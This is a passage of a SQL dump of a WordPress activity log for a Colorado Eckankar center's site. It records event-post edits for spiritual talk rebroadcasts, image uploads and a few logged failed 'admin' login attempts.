enjoy. You are warmly invited to join us for this in person event.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(240224,40877,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(240225,40877,'post_prev_post_status','draft'),(240226,40877,'post_new_post_status','publish'),(240227,40877,'post_prev_post_date','2023-11-02 14:32:58'),(240228,40877,'post_new_post_date','2023-11-02 14:37:12'),(240229,40877,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(240230,40877,'post_new_post_date_gmt','2023-11-02 20:37:12'),(240231,40877,'post_prev_thumb_id','266063'),(240232,40877,'post_prev_thumb_title','sunset-lightshine'),(240233,40877,'post_new_thumb_id','269327'),(240234,40877,'post_new_thumb_title','skylight-1tree'),(240235,40877,'_message_key','post_updated'),(240236,40877,'_user_id','2'),(240237,40877,'_user_login','S8zhaBda'),(240238,40877,'_user_email','nada@zipnadanot.org'),(240239,40877,'_server_remote_addr','76.130.120.x'),(240240,40877,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269326'),(240241,40878,'post_id','269326'),(240242,40878,'post_type','mec-events'),(240243,40878,'post_title','Our Spiritual Wake-up Calls'),(240244,40878,'_message_key','post_updated'),(240245,40878,'_user_id','2'),(240246,40878,'_user_login','S8zhaBda'),(240247,40878,'_user_email','nada@zipnadanot.org'),(240248,40878,'_server_remote_addr','76.130.120.x'),(240249,40878,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269326&action=edit'),(240250,40879,'post_type','attachment'),(240251,40879,'attachment_id','269328'),(240252,40879,'attachment_title','skylight-1tree-1'),(240253,40879,'attachment_filename','skylight-1tree-1.jpg'),(240254,40879,'attachment_mime','image/jpeg'),(240255,40879,'attachment_filesize','75692'),(240256,40879,'attachment_parent_id','269326'),(240257,40879,'attachment_parent_title','Our Spiritual Wake-up Calls'),(240258,40879,'attachment_parent_post_type','mec-events'),(240259,40879,'_message_key','attachment_created'),(240260,40879,'_user_id','2'),(240261,40879,'_user_login','S8zhaBda'),(240262,40879,'_user_email','nada@zipnadanot.org'),(240263,40879,'_server_remote_addr','76.130.120.x'),(240264,40879,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269326&action=edit'),(240265,40880,'post_type','attachment'),(240266,40880,'attachment_id','269327'),(240267,40880,'attachment_title','skylight-1tree'),(240268,40880,'attachment_filename','skylight-1tree.jpg'),(240269,40880,'attachment_mime','image/jpeg'),(240270,40880,'_message_key','attachment_deleted'),(240271,40880,'_user_id','2'),(240272,40880,'_user_login','S8zhaBda'),(240273,40880,'_user_email','nada@zipnadanot.org'),(240274,40880,'_server_remote_addr','76.130.120.x'),(240275,40880,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269326&action=edit'),(240276,40881,'post_id','269326'),(240277,40881,'post_type','mec-events'),(240278,40881,'post_title','Our Spiritual Wake-up Calls'),(240279,40881,'post_new_thumb_id','269328'),(240280,40881,'post_new_thumb_title','skylight-1tree-1'),(240281,40881,'_message_key','post_updated'),(240282,40881,'_user_id','2'),(240283,40881,'_user_login','S8zhaBda'),(240284,40881,'_user_email','nada@zipnadanot.org'),(240285,40881,'_server_remote_addr','76.130.120.x'),(240286,40881,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269326&action=edit'),(240287,40882,'post_id','269329'),(240288,40882,'post_type','mec-events'),(240289,40882,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(240290,40882,'_message_key','post_updated'),(240291,40882,'_user_id','2'),(240292,40882,'_user_login','S8zhaBda'),(240293,40882,'_user_email','nada@zipnadanot.org'),(240294,40882,'_server_remote_addr','76.130.120.x'),(240295,40882,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(240296,40883,'new_post_title','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\''),(240297,40883,'new_post_id','269329'),(240298,40883,'duplicated_post_title','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\''),(240299,40883,'duplicated_post_id','267449'),(240300,40883,'_message_key','post_duplicated'),(240301,40883,'_user_id','2'),(240302,40883,'_user_login','S8zhaBda'),(240303,40883,'_user_email','nada@zipnadanot.org'),(240304,40883,'_server_remote_addr','76.130.120.x'),(240305,40883,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(240306,40884,'post_id','269329'),(240307,40884,'post_type','mec-events'),(240308,40884,'post_title','Video Rebroadcast &#8211; In Person<br>&#8216;Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar&#8217;'),(240309,40884,'post_new_thumb_id','267350'),(240310,40884,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240311,40884,'post_meta_added','67'),(240312,40884,'_message_key','post_updated'),(240313,40884,'_user_id','2'),(240314,40884,'_user_login','S8zhaBda'),(240315,40884,'_user_email','nada@zipnadanot.org'),(240316,40884,'_server_remote_addr','76.130.120.x'),(240317,40884,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269329'),(240318,40885,'post_id','269329'),(240319,40885,'post_type','mec-events'),(240320,40885,'post_title','Video Rebroadcast &#8211;  &#8211;TEMPLATE'),(240321,40885,'post_prev_post_title','Video Rebroadcast - In Person<br>\'Sri Harold Klemp at the 2022 ECK Soul Adventure Seminar\''),(240322,40885,'post_new_post_title','Video Rebroadcast -  --TEMPLATE'),(240323,40885,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\">&nbsp;</p>\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\n</span></p>\n</blockquote>\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Please join us for a rebroadcast of<br>\nSri Harold\'s Saturday evening talk at the 2023 ECKANKAR Soul Adventure Seminar. We\'ll also share seminar highlights from those who attended. This is an in-person event only. Watch Sri Harold Klemp’s Saturday evening talk at the 2022 ECK Soul Adventure Seminar, which was held October 21 - 23 in Minneapolis, Minnesota.</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\n</span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"bg-white rounded-lg\">\n<div class=\"p-5\">\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\n<div class=\"\">\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\n</div>\n</div>\n</div>'),(240324,40885,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“The most important point of all is that you are Soul. Know that you are a spark of God and can exist fully only within the realization of that profound truth. As such, you are a light and inspiration to others.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\">Please join us for a rebroadcast of Sri Harold\'s Saturday evening talk from the 2023 ECKANKAR Soul Adventure Seminar. We\'ll also share seminar highlights from those who attended. This is an in-person event only. Watch Sri Harold Klemp’s Saturday evening talk at the 2022 ECK Soul Adventure Seminar, which was held October 21 - 23 in Minneapolis, Minnesota.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>'),(240393,40892,'post_id','269330'),(240394,40892,'post_type','mec-events'),(240395,40892,'post_title','Video Rebroadcast &#8211;TEMPLATE'),(240391,40891,'_server_remote_addr','76.130.120.x'),(240392,40891,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240389,40891,'_user_login','S8zhaBda'),(240390,40891,'_user_email','nada@zipnadanot.org'),(240356,40888,'new_post_id','269330'),(240357,40888,'duplicated_post_title','Video Rebroadcast --TEMPLATE'),(240358,40888,'duplicated_post_id','269329'),(240359,40888,'_message_key','post_duplicated'),(240360,40888,'_user_id','2'),(240361,40888,'_user_login','S8zhaBda'),(240362,40888,'_user_email','nada@zipnadanot.org'),(240363,40888,'_server_remote_addr','76.130.120.x'),(240364,40888,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(240365,40889,'post_id','269330'),(240366,40889,'post_type','mec-events'),(240367,40889,'post_title','Video Rebroadcast &#8211;TEMPLATE'),(240368,40889,'post_new_thumb_id','267350'),(240369,40889,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240370,40889,'post_meta_added','77'),(240371,40889,'_message_key','post_updated'),(240372,40889,'_user_id','2'),(240373,40889,'_user_login','S8zhaBda'),(240374,40889,'_user_email','nada@zipnadanot.org'),(240375,40889,'_server_remote_addr','76.130.120.x'),(240376,40889,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240377,40890,'failed_username','admin'),(240378,40890,'server_http_user_agent','Mozilla/5.0'),(240379,40890,'_message_key','user_unknown_login_failed'),(240380,40890,'_server_remote_addr','13.95.232.x'),(240381,40891,'post_id','269330'),(240382,40891,'post_type','mec-events'),(240383,40891,'post_title','Video Rebroadcast &#8211;TEMPLATE'),(240384,40891,'post_new_thumb_id','267350'),(240385,40891,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240386,40891,'post_meta_added','77'),(240387,40891,'_message_key','post_updated'),(240388,40891,'_user_id','2'),(240325,40885,'post_prev_post_date','2023-11-02 14:44:36'),(240326,40885,'post_new_post_date','2023-11-02 14:45:25'),(240327,40885,'_message_key','post_updated'),(240328,40885,'_user_id','2'),(240329,40885,'_user_login','S8zhaBda'),(240330,40885,'_user_email','nada@zipnadanot.org'),(240331,40885,'_server_remote_addr','76.130.120.x'),(240332,40885,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269329'),(240333,40886,'post_id','269329'),(240334,40886,'post_type','mec-events'),(240335,40886,'post_title','Video Rebroadcast &#8211;TEMPLATE'),(240336,40886,'post_prev_post_title','Video Rebroadcast -  --TEMPLATE'),(240337,40886,'post_new_post_title','Video Rebroadcast --TEMPLATE'),(240338,40886,'post_prev_post_date','2023-11-02 14:45:25'),(240339,40886,'post_new_post_date','2023-11-02 14:45:36'),(240340,40886,'_message_key','post_updated'),(240341,40886,'_user_id','2'),(240342,40886,'_user_login','S8zhaBda'),(240343,40886,'_user_email','nada@zipnadanot.org'),(240344,40886,'_server_remote_addr','76.130.120.x'),(240345,40886,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269329&action=edit'),(240346,40887,'post_id','269330'),(240347,40887,'post_type','mec-events'),(240348,40887,'post_title','Video Rebroadcast &#8211;TEMPLATE'),(240349,40887,'_message_key','post_updated'),(240350,40887,'_user_id','2'),(240351,40887,'_user_login','S8zhaBda'),(240352,40887,'_user_email','nada@zipnadanot.org'),(240353,40887,'_server_remote_addr','76.130.120.x'),(240354,40887,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=rebroadcast&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=76fbdd1019&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=11%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(240355,40888,'new_post_title','Video Rebroadcast --TEMPLATE'),(240396,40892,'post_new_thumb_id','267350'),(240397,40892,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240398,40892,'post_meta_added','77'),(240399,40892,'_message_key','post_updated'),(240400,40892,'_user_id','2'),(240401,40892,'_user_login','S8zhaBda'),(240402,40892,'_user_email','nada@zipnadanot.org'),(240403,40892,'_server_remote_addr','76.130.120.x'),(240404,40892,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240405,40893,'post_id','269330'),(240406,40893,'post_type','mec-events'),(240407,40893,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240408,40893,'post_new_thumb_id','267350'),(240409,40893,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240410,40893,'post_meta_added','77'),(240411,40893,'_message_key','post_updated'),(240412,40893,'_user_id','2'),(240413,40893,'_user_login','S8zhaBda'),(240414,40893,'_user_email','nada@zipnadanot.org'),(240415,40893,'_server_remote_addr','76.130.120.x'),(240416,40893,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240417,40894,'failed_username','admin'),(240418,40894,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(240419,40894,'_message_key','user_unknown_login_failed'),(240420,40894,'_server_remote_addr','103.176.78.x'),(240421,40895,'failed_username','admin'),(240422,40895,'server_http_user_agent','Mozilla/5.0'),(240423,40895,'_message_key','user_unknown_login_failed'),(240424,40895,'_server_remote_addr','13.95.232.x'),(240425,40896,'failed_username','admin'),(240426,40896,'server_http_user_agent','Mozilla/5.0'),(240427,40896,'_message_key','user_unknown_login_failed'),(240428,40896,'_server_remote_addr','13.95.232.x'),(240429,40897,'failed_username','admin'),(240430,40897,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(240431,40897,'_message_key','user_unknown_login_failed'),(240432,40897,'_xmlrpc_request','true'),(240433,40897,'_server_remote_addr','151.236.22.x'),(240434,40898,'failed_username','admin'),(240435,40898,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(240436,40898,'_message_key','user_unknown_login_failed'),(240437,40898,'_server_remote_addr','137.59.125.x'),(240438,40899,'post_id','269330'),(240439,40899,'post_type','mec-events'),(240440,40899,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240441,40899,'post_new_thumb_id','267350'),(240442,40899,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240443,40899,'post_meta_added','77'),(240444,40899,'_message_key','post_updated'),(240445,40899,'_user_id','2'),(240446,40899,'_user_login','S8zhaBda'),(240447,40899,'_user_email','nada@zipnadanot.org'),(240448,40899,'_server_remote_addr','76.130.120.x'),(240449,40899,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240450,40900,'failed_username','admin'),(240451,40900,'server_http_user_agent','Mozilla/5.0'),(240452,40900,'_message_key','user_unknown_login_failed'),(240453,40900,'_server_remote_addr','13.95.232.x'),(240454,40901,'post_id','269330'),(240455,40901,'post_type','mec-events'),(240456,40901,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240457,40901,'post_new_thumb_id','267350'),(240458,40901,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240459,40901,'post_meta_added','77'),(240460,40901,'_message_key','post_updated'),(240461,40901,'_user_id','2'),(240462,40901,'_user_login','S8zhaBda'),(240463,40901,'_user_email','nada@zipnadanot.org'),(240464,40901,'_server_remote_addr','76.130.120.x'),(240465,40901,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240466,40902,'post_id','269330'),(240467,40902,'post_type','mec-events'),(240468,40902,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240469,40902,'post_new_thumb_id','267350'),(240470,40902,'post_new_thumb_title','harold-talk-OCT-2022-promo-2'),(240471,40902,'post_meta_added','77'),(240472,40902,'_message_key','post_updated'),(240473,40902,'_user_id','2'),(240474,40902,'_user_login','S8zhaBda'),(240475,40902,'_user_email','nada@zipnadanot.org'),(240476,40902,'_server_remote_addr','76.130.120.x'),(240477,40902,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240478,40903,'post_id','269330'),(240479,40903,'post_type','mec-events'),(240480,40903,'post_title','Video Rebroadcast &#8211; Sri Harold Klemp'),(240481,40903,'post_prev_post_name',''),(240482,40903,'post_new_post_name','video-rebroadcast-sri-harold-klemp'),(240483,40903,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\">&nbsp;</p>\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\n<p><span style=\"color: #666666; font-size: 14pt;\">“Happiness is not a matter of how your outer life appears to someone else. Happiness is a state of consciousness.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\n</span></p>\n</blockquote>\n<p class=\"\"><span style=\"font-size: 14pt;\">Please join us at the</span><strong><span style=\"font-size: 14pt;\"> Colorado Springs ECK Center</span></strong><span style=\"font-size: 14pt;\"> for a rebroadcast of Sri Harold\'s Saturday evening talk from the recent 2023 ECKANKAR Soul Adventure Seminar held in Minneapolis, Minnesota.&nbsp;</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\n</span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"bg-white rounded-lg\">\n<div class=\"p-5\">\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\n<div class=\"\">\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\n</div>\n</div>\n</div>'),(240484,40903,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<blockquote class=\"bg-blockquote border\" style=\"margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; border-color: #de752a;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Happiness is not a matter of how your outer life appears to someone else. Happiness is a state of consciousness.</span><span style=\"color: #666666; font-size: 14pt;\">\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Sri Harold Klemp, the Mᴀʜᴀɴᴛᴀ,the Living ECK Master<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Please join us at the</span><strong><span style=\"font-size: 14pt;\"> Colorado Springs ECK Center</span></strong><span style=\"font-size: 14pt;\"> for a rebroadcast of Sri Harold\'s Saturday evening talk from the recent 2023 ECKANKAR Soul Adventure Seminar held in Minneapolis, Minnesota.&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">In his talks and writings, Harold Klemp\'s sense of humor and practical approach to spirituality have helped many people around the world find truth in their lives and greater inner freedom, wisdom, and love. <br>\r\n</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><strong>COVID-19 Safety Measures</strong></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 11pt;\"><strong>***</strong><em> Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>'),(240485,40903,'post_prev_post_status','draft'),(240486,40903,'post_new_post_status','publish'),(240487,40903,'post_prev_post_date','2023-11-02 17:01:08'),(240488,40903,'post_new_post_date','2023-11-02 17:01:11'),(240489,40903,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(240490,40903,'post_new_post_date_gmt','2023-11-02 23:01:11'),(240491,40903,'_message_key','post_updated'),(240492,40903,'_user_id','2'),(240493,40903,'_user_login','S8zhaBda'),(240494,40903,'_user_email','nada@zipnadanot.org'),(240495,40903,'_server_remote_addr','76.130.120.x'),(240496,40903,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269330'),(240497,40904,'post_type','attachment'),(240498,40904,'attachment_id','269331'),(240499,40904,'attachment_title','video-rebroadcast-3'),(240500,40904,'attachment_filename','video-rebroadcast-3.jpg'),(240501,40904,'attachment_mime','image/jpeg'),(240502,40904,'attachment_filesize','87102'),(240503,40904,'attachment_parent_id','269330'),(240504,40904,'attachment_parent_title','Video Rebroadcast &#8211; Sri Harold 